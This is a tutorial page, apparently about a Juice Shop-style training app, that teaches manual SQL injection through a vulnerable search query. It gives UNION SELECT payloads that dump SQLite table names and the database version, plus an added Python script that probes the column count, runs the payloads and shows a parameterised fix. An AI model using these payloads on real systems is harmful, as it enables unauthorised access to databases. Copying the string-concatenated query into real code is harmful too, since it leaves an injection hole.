Injection Attacks: The Complete 2020 Guide

Manual SQL Injections



CREATE TABLE `Users` 
(`id` INTEGER PRIMARY KEY AUTOINCREMENT, 
`username` VARCHAR(255) DEFAULT '', 
`email` VARCHAR(255) UNIQUE, 
`password` VARCHAR(255), 
`role` VARCHAR(255) DEFAULT 'customer', 
`deluxeToken` VARCHAR(255) DEFAULT '', 
`lastLoginIp` VARCHAR(255) DEFAULT '0.0.0.0', 
`profileImage` VARCHAR(255) DEFAULT '/assets/public/images/uploads/default.svg', 
`totpSecret` VARCHAR(255) DEFAULT '', 
`isActive` TINYINT(1) DEFAULT 1, 
`createdAt` DATETIME NOT NULL, 
`updatedAt` DATETIME NOT NULL, 
`deletedAt` DATETIME)



Schema of the Users table in the application's SQLite database



SELECT * FROM Products WHERE 
((name LIKE '%' OR description LIKE '%') AND deletedAt IS NULL) 
ORDER BY name;


The SQL query the application builds for the search function. The user's search term is spliced into the LIKE patterns, so that is where the payloads below land.



SELECT * FROM Products WHERE ((name LIKE '%')) UNION SELECT [etc...]


What we want the query to look like: close the LIKE string and both parentheses, then append our own UNION SELECT.



SELECT name FROM sqlite_master
WHERE type='table' 
ORDER BY name;


Query that lists every table in a SQLite database (sqlite_master is the table that stores the schema)



')) UNION SELECT name,name,name,name,name,name,name,name,name FROM sqlite_master WHERE type='table' --


What our payload looks like. The nine repetitions of name match the nine columns Products returns, because a UNION needs the same number of columns on both sides; the trailing -- comments out the remainder of the application's query.



SELECT * FROM Products WHERE ((name LIKE '%')) UNION SELECT name,name,name,name,name,name,name,name,name
FROM sqlite_master 
WHERE type='table' --


Which will result in this query. Everything after the -- (the original OR description clause, the deletedAt IS NULL filter and the ORDER BY) is commented out, so the table names come back as if they were product rows.



')) UNION SELECT sqlite_version(),sqlite_version(),sqlite_version(),sqlite_version(),sqlite_version(),sqlite_version(),sqlite_version(),sqlite_version(),sqlite_version(); --


Payload to get the SQLite database version, again repeated across nine columns to satisfy the UNION
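The whole procedure above, end to end, as an added example that is not part of the original page: a Python script using the standard sqlite3 module builds the same search query by string concatenation against a constructed in-memory database, runs the page's two payloads through it, adds the step the page skips (discovering that the UNION has to supply nine columns) and shows the parameterised query that stops the attack. The Products column layout, the sample rows and the helper names are assumptions made for this example; the Users table is an abbreviated copy of the page's schema.

```python
import sqlite3

# Constructed in-memory stand-in for the application's SQLite database.
# The Products layout is an assumption chosen to match the page's payload,
# which puts nine expressions in its UNION SELECT, so Products must have
# nine columns. Users is an abbreviated copy of the page's schema.
SCHEMA = """
CREATE TABLE Products (
  id INTEGER PRIMARY KEY AUTOINCREMENT,
  name VARCHAR(255), description TEXT, price DECIMAL, deluxePrice DECIMAL,
  image VARCHAR(255), createdAt DATETIME NOT NULL, updatedAt DATETIME NOT NULL,
  deletedAt DATETIME
);
CREATE TABLE Users (
  id INTEGER PRIMARY KEY AUTOINCREMENT, username VARCHAR(255) DEFAULT '',
  email VARCHAR(255) UNIQUE, password VARCHAR(255), role VARCHAR(255) DEFAULT 'customer'
);
INSERT INTO Products (name, description, price, deluxePrice, image, createdAt, updatedAt, deletedAt)
VALUES ('Apple Juice',   'Fresh pressed',  1.99, 0.99, 'apple.jpg',   '2020-01-01', '2020-01-01', NULL),
       ('Orange Juice',  'With pulp',      2.49, 1.49, 'orange.jpg',  '2020-01-01', '2020-01-01', NULL),
       ('Retired Juice', 'No longer sold', 0.99, 0.49, 'retired.jpg', '2020-01-01', '2020-01-01', '2020-02-01');
"""

# The two payloads exactly as the page gives them. The ';' in the version
# payload is harmless here: the driver compiles only the first statement and
# everything after the -- is a comment.
PAYLOAD_TABLES = ("')) UNION SELECT name,name,name,name,name,name,name,name,name "
                  "FROM sqlite_master WHERE type='table' --")
PAYLOAD_VERSION = "')) UNION SELECT " + ",".join(["sqlite_version()"] * 9) + "; --"
SQLITE_VERSION = sqlite3.sqlite_version  # ground truth to compare the leaked value against


def open_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def search_vulnerable(conn, criteria):
    """The page's search query, built by splicing the user's term into the SQL text."""
    sql = (f"SELECT * FROM Products WHERE ((name LIKE '%{criteria}%' "
           f"OR description LIKE '%{criteria}%') AND deletedAt IS NULL) ORDER BY name")
    return conn.execute(sql).fetchall()


def search_safe(conn, criteria):
    """Same query with bound parameters: the term is data and cannot change the SQL."""
    sql = ("SELECT * FROM Products WHERE ((name LIKE ? OR description LIKE ?) "
           "AND deletedAt IS NULL) ORDER BY name")
    pattern = f"%{criteria}%"  # % and _ are still LIKE wildcards; escape them if that matters
    return conn.execute(sql, (pattern, pattern)).fetchall()


def find_column_count(conn, max_cols=20):
    """The step the page skips: SQLite rejects a UNION whose two sides differ in
    column count, so the shortest NULL,NULL,... probe that does not error tells
    us how many columns the injected SELECT has to supply."""
    for n in range(1, max_cols + 1):
        probe = "')) UNION SELECT " + ",".join(["NULL"] * n) + " --"
        try:
            search_vulnerable(conn, probe)
            return n
        except sqlite3.OperationalError:
            continue
    return None


def injected_rows(rows):
    """Rows contributed by the UNION: every one of their nine cells holds the same value."""
    return [r for r in rows if len(set(r)) == 1]


def leaked_table_names(conn):
    # Expect the application's tables plus sqlite_sequence, which AUTOINCREMENT creates.
    return sorted(r[0] for r in injected_rows(search_vulnerable(conn, PAYLOAD_TABLES)))


def leaked_version(conn):
    return injected_rows(search_vulnerable(conn, PAYLOAD_VERSION))[0][0]


if __name__ == "__main__":
    db = open_db()
    print("Products has", find_column_count(db), "columns")
    print("tables:", leaked_table_names(db))
    print("version:", leaked_version(db))
    print("same payload, parameterised:", search_safe(db, PAYLOAD_TABLES))
```

Run it directly to print the column count, the leaked table names and the version. Two details are worth noticing: because the trailing -- also comments out AND deletedAt IS NULL, the injected query returns soft-deleted products alongside the table names, and sqlite_sequence shows up next to the application's own tables. The parameterised version still honours LIKE wildcards in the user's term (% and _), so escape those if letting a bare % list every product is a concern; what it can no longer do is change the shape of the query.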

By Christophe Limpalair
